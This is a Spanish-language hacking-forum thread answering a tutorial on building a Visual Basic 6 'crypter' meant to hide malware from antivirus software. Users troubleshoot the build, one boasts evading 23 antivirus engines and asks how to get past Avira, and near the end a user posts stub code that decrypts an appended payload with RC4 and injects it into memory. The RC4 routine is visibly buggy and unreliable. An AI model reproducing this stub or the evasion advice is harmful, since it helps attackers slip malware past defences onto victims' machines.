asi quien noooooooooo con una buena comelona musikita de fondo suave y a empezar a trabajarrr
que pasada, asi quien se resiste gracias Skyweb07
no se si habra mejores foros que este por que cuando lo encontre deje de buscar aqui no solo encontre una fuente de informacion inagotable ademas encontre una familia

gracias a todos sois geniales
todos somos ignorantes aunque no todos ignoramos las mismas cosas
esta super espero aprender mucho con tu ayuda gracias era lo que estaba buscando muchas gracias
Imagen
Muy Bueno Skyweb07, Impresionante, Me Lei todos los comments y creo que tengo un problema que tiene otro es que al encryptar el archivo se abre uan ventana DOS y se cierra

Edito: explique mal el error el tema es que todo sale bien hasta que cuando voy a abrir el archivo encryptado se abre una ventana MS DOS y se cierra
El link de la pagina no me funciona
exelente muy buen tutto gracias me sirvio mucho ahora el unico problema que tengo es como hacerlo indetectable al avira es el unico qu eme falta, ya lo deje indetectado por todos los otros 23 antivirus
pero hace falta el avira, si alguin pudiera colaborarme lo agradeceria mucho

pero increhible el tutto me sirvio demaciado mejor dicho eres un genio men gracias
chichan111 escribió:exelente muy buen tutto gracias me sirvio mucho ahora el unico problema que tengo es como hacerlo indetectable al avira es el unico qu eme falta, ya lo deje indetectado por todos los otros 23 antivirus
pero hace falta el avira, si alguin pudiera colaborarme lo agradeceria mucho

pero increhible el tutto me sirvio demaciado mejor dicho eres un genio men gracias
En esta misma seccion xD el post de demonio666 como saltar avira un video muy bueno
Hola Spyweb primero de nada felicitarte x tu gran tutorial.

Ahora te indico un problema que me sale al añadir un componente soy nuevo en esto

Cuando añado el CommonDialog en el cryter lo arastro para añadirlo me sale el siguiente mensaje :

[Enlace externo eliminado para invitados]

Alguien me exa una mano de como solucionar este error !

Saludos y Gracias de antemano
ChUcKy ^.- escribió:Hola Spyweb primero de nada felicitarte x tu gran tutorial.

Ahora te indico un problema que me sale al añadir un componente soy nuevo en esto

Cuando añado el CommonDialog en el cryter lo arastro para añadirlo me sale el siguiente mensaje :

[Enlace externo eliminado para invitados]

Alguien me exa una mano de como solucionar este error !

Saludos y Gracias de antemano
Primero no es Spyweb LOL.. Es coña :p
Segundo ese error es porque tu windows no es válido y no puedes usar los controles del mismo al no ser que sea en modo Runtime, pero en modo de programación o como se llame no puedes.. te recomiendo que instales algun validador de windows y sino formatees como hize yo una ves :P
Imagen
skyweb07 escribió: Primero no es Spyweb LOL.. Es coña :p
Segundo ese error es porque tu windows no es válido y no puedes usar los controles del mismo al no ser que sea en modo Runtime, pero en modo de programación o como se llame no puedes.. te recomiendo que instales algun validador de windows y sino formatees como hize yo una ves :P
Falso, eso es porque tu visual basic no tiene el Service Pack 6, actualizalo, y necesitas un programa que ahora mismo no recuerdo consultale a BluetoothWifi el me lo dió o verifica en la pagina de microsoft.

Saludos!
SharkI escribió:
skyweb07 escribió: Primero no es Spyweb LOL.. Es coña :p
Falso, eso es porque tu visual basic no tiene el Service Pack 6, actualizalo, y necesitas un programa que ahora mismo no recuerdo consultale a BluetoothWifi el me lo dió o verifica en la pagina de microsoft.

Saludos!
Pues mira tu yo creia que era por mi Windows :P LOL... Aunque yo no tengo instalado el service pack 6 de VB y no me pasa eso :P estraño.......
Imagen
Mi xp esta Validado es algo extraño alguien me exa una mano de como solucionar el problema !

Empieso a introducirme a esto y me encuentro con este error que no me deja continuar

Saludos
yo creo que debes de ejecutar el vb como administrador
click derecho
y click sobre ejecutar como admnistrador
y listo.

podria ser
Última edición por dexter back el 02 Jul 2009, 03:17, editado 1 vez en total.
Imagen
dexter back escribió:yo creo que debes de ejecutar el vb como administrador
click izquierdo
y click sobre ejecutar como admnistrador
y listo.

podria ser
Acabo de probarlo y no me funciona

Espero que alguien me pueda ayudar a solucionar el problema

Saludos
Termine el tutorial(me salte la parte ultima de que le peudna poner contraseña ellos..ya que nose ni para que es..con ke.. XD)y me dio error..

Run-Time error '9':
Subcript out of range

Os dejo el code del stub:

Código: Seleccionar todo

Sub Main()
Dim YO As String, Datos As String, sData() As String

YO = App.Path & "\" & App.EXEName & ".exe"

Open YO For Binary As #1
Datos = Space(LOF(1))
Get #1, , Datos
Close #1

sData() = Split(Datos, "##$$##")

sData(1) = RC4(sData(1), "pasku")

Injec YO, StrConv(sData(1), vbFromUnicode), vbNullString
'ya eta to listooo!!
End Sub

Public Function RC4(ByVal Data As String, ByVal Password As String) As String
On Error Resume Next
Dim F(0 To 255) As Integer, X, Y As Long, Key() As Byte
Key() = StrConv(Password, vbFromUnicode)
For X = 0 To 255
    Y = (Y + F(X) + Key(X Mod Len(Password))) Mod 256
    F(X) = X
Next X
Key() = StrConv(Data, vbFromUnicode)
For X = 0 To Len(Data)
    Y = (Y + F(Y) + 1) Mod 256
    Key(X) = Key(X) Xor F(Temp + F((Y + F(Y)) Mod 254))
Next X
RC4 = StrConv(Key, vbUnicode)
End Function

Imagen

Imagen

Lo siento,Te quivocaste de cnta amigo ;).
Cerrado

Volver a “Manuales y Tutoriales”